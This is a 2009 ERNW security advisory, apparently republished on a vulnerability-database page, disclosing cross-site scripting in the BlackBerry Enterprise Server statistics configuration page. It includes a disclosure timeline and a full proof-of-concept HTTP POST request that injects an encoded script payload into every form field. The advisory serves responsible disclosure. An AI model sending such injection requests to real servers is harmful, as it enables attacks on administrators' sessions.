Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21697
HistoryApr 18, 2009 - 12:00 a.m.

ERNW Security Advisory 01-2009: XSS in Blackberries Mobile Data Service Connection Service

2009-04-1800:00:00
vulners.com
23

ERNW Security Advisory 01-2009

XSS in Blackberries Mobile Data Service Connection Service

Author: Michael Thumann <mthumann[at]ernw.de>

  1. Summary
    The Blackberry Mobile Data Service Connection is vulnerable to
    several XSS attacks in the "Customize Statistics Page".

  2. CVSS V2 Base Score : 3.5 (based on vendor rating)

  3. Products affected
    Blackberry Enterprise Server: all versions prior to 4.1.6 MR4

  4. Patch Availability : A patch is available from the vendor.

  5. Details
    Injecting scripts (containing standard and encoded XSS attacks) into
    all the fields of the "customize statitics page" reveals that none
    of the fields are properly validated for malicious input and the
    output isn't sanitized.

  6. Solution
    Update the affected products to the actual version.

  7. Time-Line
    16 Feb 2009: Discovery of the vulnerability
    02 Mar 2009: Vulnerability reported to vendor
    02 Mar 2009: Answer from vendor
    16 Apr 2009: Patch available
    16 Apr 2009: Public Disclosure

  8. Exploit
    POST /admin/statistics/ConfigureStatistics HTTP/1.0
    Cookie: JSESSIONID=…
    Content-Length: 753
    Accept: /
    Accept-Language: en-US
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
    Host: …
    Content-Type: application/x-www-form-urlencoded
    Referer: http://x:8080/admin/statistics/ConfigureStatistics

customDate=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
interval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
lastCustomInterval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E
&lastIntervalLength=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%
3E&nextCustomInterval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript
%3E&nextIntervalLength=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%
2Fscript%3E&action=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E
&delIntervalIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
addStatIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
delStatIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
referenceTime=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E

  1. Thanks
    We would like to thank the guys from Blackberry for working
    together on this issue in a professional and responsible way.

  2. Disclaimer
    The informations in this advisory are provided "AS IS"
    without warranty of any kind. In no event shall the authors be liable
    for any damages whatsoever including direct, indirect, incidental,
    consequential, loss of business profits or special damages due to the
    misuse of any information provided in this advisory.